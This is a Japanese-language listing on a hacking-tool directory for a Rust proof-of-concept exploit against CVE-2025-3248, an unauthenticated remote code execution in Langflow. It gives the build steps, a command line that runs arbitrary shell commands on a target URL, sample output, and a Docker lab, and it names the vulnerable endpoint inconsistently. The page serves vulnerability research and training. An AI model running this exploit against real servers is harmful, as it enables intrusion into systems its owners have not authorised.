Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-3248-POC — CVE-2025-3248 に対する Rust ベースの概念実証エクスプロイト。Langflow の /api/v1/validate/code エンドポイントを介した、認証不要のリモートコード実行を標的としています。テスト用のローカル Docker ラボを含みます。 | Kitploit
ツール/GitHubGitHub/b0ysie7e/cve-2025-3248-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubb0ysie7e/cve-2025-3248-poc

CVE-2025-3248-POC

CVE-2025-3248 に対する Rust ベースの概念実証エクスプロイト。Langflow の /api/v1/validate/code エンドポイントを介した、認証不要のリモートコード実行を標的としています。テスト用のローカル Docker ラボを含みます。

リポジトリを見る
18ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Langflow RCE エクスプロイト - CVE-2025-3248

⚠️ 免責事項
このコードは教育および研究目的のみを目的としています。明示的な許可なくシステムで無断使用することは、法律違反となる可能性があります。
作者は、このツールの誤用や悪意のある活動について一切の責任を負いません。


脆弱性情報

CVE-2025-3248 - 重要

CVSS スコア: 9.8 | EPSS スコア: 92.57% | 公開日: 2025年5月22日

影響を受けるバージョン

  • 脆弱なバージョン: v1.3.0 以下のすべてのバージョン
  • 修正済み: v1.3.0 以降のバージョン

攻撃ベクトル

エンドポイント /api/v1/validate/code はサニタイズされていない Python コードを受け入れ、exec() で直接実行します。認証は不要です。

脆弱なコード

root@kitploit:~
# langflow/api/builder/execute.py
exec(code)  # No input validation or sandboxing!

技術的詳細

Langflow は /api/v1/builder/execute_code エンドポイントを公開しており、ユーザーが提供した Python コードを受け取り、バックエンドで直接 exec() に渡します。認証やサンドボックスがないため、攻撃者は任意のペイロードを作成してコードを実行できます。

エクスプロイトの実行

必要条件

  • Rust 1.70+ (rustup でインストール)
  • Cargo (Rust パッケージマネージャー)
root@kitploit:~
# Clone repository
git clone <repo-url>
cd CVE-2025-3248-POC

cargo build --release

# ./target/release/CVE-2025-3248-POC
root@kitploit:~
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"

例:

root@kitploit:~
❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860, 
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)   

ローカルラボのセットアップ

クイックスタート

root@kitploit:~
> cd lab
> sudo docker-compose up -d

> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'

ラボの停止

root@kitploit:~
> sudo docker-compose down
ツールをダウンロード